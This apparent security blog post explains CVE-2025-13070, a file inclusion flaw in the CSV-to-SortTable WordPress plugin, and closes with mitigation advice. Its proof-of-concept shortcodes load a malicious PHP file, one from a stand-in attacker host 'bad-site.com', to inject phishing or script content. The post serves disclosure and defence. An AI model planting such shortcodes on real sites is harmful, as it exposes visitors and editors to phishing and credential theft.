The CSV-to-SortTable WordPress plugin is a handy little tool for site owners, but its codebase shows that it was not built with hackers in mind. CSV-to-SortTable does not validate files included in its src attribute, which makes it possible to perform several exploits.. CVE-2025-13070 flags it as vulnerable to local file inclusion (LFI), but it’s also vulnerable to much more including cross-site scripting (XSS) and a number of supply-chain vulnerabilities, depending on how it’s used on the WordPress site.
How CSV to Table Plugin Works
CSV-to-SortTable works by taking a file from either your local host or an external host (more on that later) and turning it into a presentable table on your site. Let’s say that you have 100 products from a specific manufacturer on your ecommerce site. You can download the CSV and host it on your web server, or you can link to the site externally. The plugin then turns the CSV data into an HTML table. CSV-to-SortTable is open source, so you can read the code yourself if you’re into PHP.
The plugin is easy to use. You simply add the following shortcode to your WordPress post:
[csv src=/products.csv]
You can also link to an external CSV like this:
[csv src=http://example.com/products.csv]
Pretty easy and convenient, but adds vulnerabilities to your site. CVE-2025-13070 specifically covers local file inclusion vulnerabilities, but the external linking could also cause issues if an external site is compromised or files change without being validated by the plugin code.
In a way, the second type of attack is a supply-chain attack since the ecommerce site owner could innocently link to an external file that could then be altered by an attacker. This vulnerability can also be mitigated by downloading the CSV file to your local web host, which is considered good internet manners anyway. Hotlinking is often frowned upon in civilized webmaster circles.
Local File Inclusion and CVE-2025-13070 PoC
If you are an administrator for your site, uploading a CSV file and using it in the CSV to table plugin seems harmless, but you might allow other users to upload files, either from the WordPress dashboard or from a customized page on your site. You might also allow users with the contributor role to add content to a site and use the plugin’s shortcode, which is where the vulnerability is exploited.
Let’s say that you assign the user “Kelly” as a contributor. A contributor role in WordPress can add content, but they can’t edit or make changes to anyone else’s content. Contributors can also edit their own content and send it to an editor for review. It’s not uncommon for site administrators to give the contributor upload_files permissions, which allows them to add an image to their posts. They can add a featured image or embed images within their posts.
Now, let’s say that Kelly decides to go rogue and uploads a file named malicious.php to your WordPress site. Instead of pointing to a CSV file, suppose the contributor Kelly used the following shortcode to an article:
[csv src=malicious.php]
The malicious.php file could have a redirect that sends users to a phishing site, or perhaps the PHP file has its own brand of phishing content to steal credentials from users.
You might think that blocking contributors from uploading files is the answer, which does stop some of the attacks, but suppose Kelly uses the following shortcode:
[csv src=https://bad-site.com/attack.php]
Because the WordPress plugin does not validate input and whitelist file types, it’s possible to inject malicious content into a viewer’s browser. This exploit could allow phishing, XSS, code injection, or simply deface your site. If your site has any ability to save to a database from the values pulled from imported files, the attacker could also persist malicious data using your database. This part of the attack is not covered in the CVE, but it’s possible to expose multiple vulnerabilities with the CSV to table functionality.
To take it a step further, a particularly crafty attacker could also affect administrators and editors on your site. If you have an editor or administrator checking the content from contributors, the attacker could also trick them into divulging credentials or sensitive information in the preview window of the attacker’s posts.
So many possibilities with this vulnerability!
What Can You Do to Patch the Plugin
The plugin developer has not released a patch. If you’re a coder, you could fork the plugin from the CSV-to-SortTable Github repository. You would need to edit the /lib/class-csv-to-sorttable.php file to fix the issue. Whitelist files to only allow CSV or other comma-delimited files. Currently, the repository has no open issues, but you could also open a new issue in the hopes that the developer will fix it.
If you don’t use any contributors, you might not generally worry about this vulnerability, but it’s not recommended to leave an open vulnerability on your site. You could disable the plugin if it’s not used, or you can replace it with another plugin that performs the same function.